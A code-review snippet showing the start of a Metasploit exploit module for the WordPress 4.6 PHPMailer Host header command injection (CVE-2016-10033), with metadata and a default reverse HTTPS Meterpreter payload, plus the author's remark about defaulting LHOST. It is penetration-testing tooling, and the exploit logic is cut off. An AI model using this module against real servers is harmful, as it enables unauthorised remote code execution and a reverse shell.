modules/exploits/unix/webapp/wp_phpmailer_host_header.rb

```diff
@@ -0,0 +1,176 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'                => 'WordPress PHPMailer Host Header Command Injection',
+      'Description'         => %q{
+        This module exploits a command injection vulnerability in WordPress
+        version 4.6 with Exim as an MTA via a spoofed Host header to PHPMailer.
+
+        A valid WordPress username is required to exploit the vulnerability.
+        Additionally, due to the altered Host header, exploitation is limited to
+        the default virtual host, assuming the header isn't mangled in transit.
+      },
+      'Author'              => [
+        'Dawid Golunski', # Vulnerability discovery
+        'wvu'             # Metasploit module
+      ],
+      'References'          => [
+        ['CVE', '2016-10033'],
+        ['URL', 'https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html'],
+        ['URL', 'http://www.exim.org/exim-html-current/doc/html/spec_html/ch-string_expansions.html']
+      ],
+      'DisclosureDate'      => 'May 3 2017',
+      'License'             => MSF_LICENSE,
+      'Platform'            => 'linux',
+      'Arch'                => [ARCH_X86, ARCH_X64],
+      'Privileged'          => false,
+      'Targets'             => [
+        ['WordPress 4.6 / Exim', {}]
+      ],
+      'DefaultTarget'       => 0,
+      'DefaultOptions'      => {
+        'PAYLOAD'           => 'linux/x64/meterpreter_reverse_https',
+        'LHOST'             => Rex::Socket.source_address,
```

Comment:
And I was kinda tired of people asking what to set `LHOST` to. At least this gets us halfway there (makes less sense with NAT, forwards, multihoming, etc.).

I can remove this if you think it's rude. I'm more worried it'll start a bad habit for new users. Forcing them to set `LHOST` forces them to think about it.